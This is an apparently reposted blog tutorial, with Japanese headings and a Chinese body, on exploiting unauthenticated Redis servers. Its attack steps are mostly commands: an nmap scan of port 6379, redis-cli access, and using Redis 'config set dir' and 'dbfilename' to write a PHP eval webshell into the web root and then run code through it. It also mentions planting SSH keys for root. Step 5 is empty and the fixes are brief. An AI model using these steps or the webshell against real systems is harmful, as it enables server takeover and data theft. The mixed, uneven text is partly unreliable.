Web セキュリティ: Redis の不正アクセス脆弱性テスト。

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

デフォルトでは、Redis はポート 6379 にバインドされており、信頼できないソースからの IP アクセスなどの他の関連セキュリティ ポリシーを回避するファイアウォール ルールが追加されていない場合、パブリック ネットワークに直接公開されます。その場合、パスワードが設定されていないか、弱いパスワードが設定されているため、この脆弱性が発生します。


目次:

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

Redis の不正アクセス脆弱性の害:

Redis の不正アクセス脆弱性テスト:

ステップ 1: ポート スキャンに nmap ツールを使用します。

ステップ 2: Redis に接続して機密情報を取得できるかどうかを確認します。

ステップ 3: Redis の不正な脆弱性を利用してプログラムをアップロードする (トロイの木馬)

ステップ 4: アップロードされたプログラム (トロイの木馬) にアクセスする

ステップ 5: アップロードされたプログラム (トロイの木馬) を使用してサーバーに接続し、制御を取得します。

Redisの不正アクセス脆弱性修復方法:


Redis の不正アクセス脆弱性の害:

黑客可以通过数据备份功能往磁盘写入后门文件

黑客无需认证就可以访问到内部数据,可能导致敏感信息泄露.

然后在 Redis 以 root 身份运行的话,攻击者可以给root账户写入SSH公钥文件,再直接SSH登录目标服务器.

Redis の不正アクセス脆弱性テスト:

ステップ 1: ポート スキャンに nmap ツールを使用します。

nmap 服务器IP -p 查看的端口

nmap 192.168.0.101 -p 6379            //扫描 6379 端口是否开放.


ステップ 2: Redis に接続して機密情報を取得できるかどうかを確認します。

sudo redis-cli -h 192.168.0.101        //连接 Redis 数据库.

info                                   //查看 敏感 信息.


ステップ 3: Redis の不正な脆弱性を利用してプログラムをアップロードする (トロイの木馬)

config set dir /var/www/html        //在网站的根目录/var/www/html下写进去一个脚本.
config set dbfilename bgxg.php        //脚本名称为 bgxg.php
set webshell "<?php @eval($_POST['bgxg']); ?>"        // 脚本内容" 中 "的内容.
save            // 保存 刚刚写入的信息.


ステップ 4: アップロードされたプログラム (トロイの木馬) にアクセスする

http://192.168.0.101/bgxg.php        // bgxg.php 是刚刚写入的木马文件

bgxg=phpinfo();                      // phpinfo(); 查看服务器的信息.


ステップ 5: アップロードされたプログラム (トロイの木馬) を使用してサーバーに接続し、制御を取得します。


Redisの不正アクセス脆弱性修復方法:

(1)Redis 添加密码验证.

(2)禁止外网访问 Redis 端口服务.

(3)修改 Redis 服务 默认端口.

    

     

      

おすすめ

転載: blog.csdn.net/weixin_54977781/article/details/130900745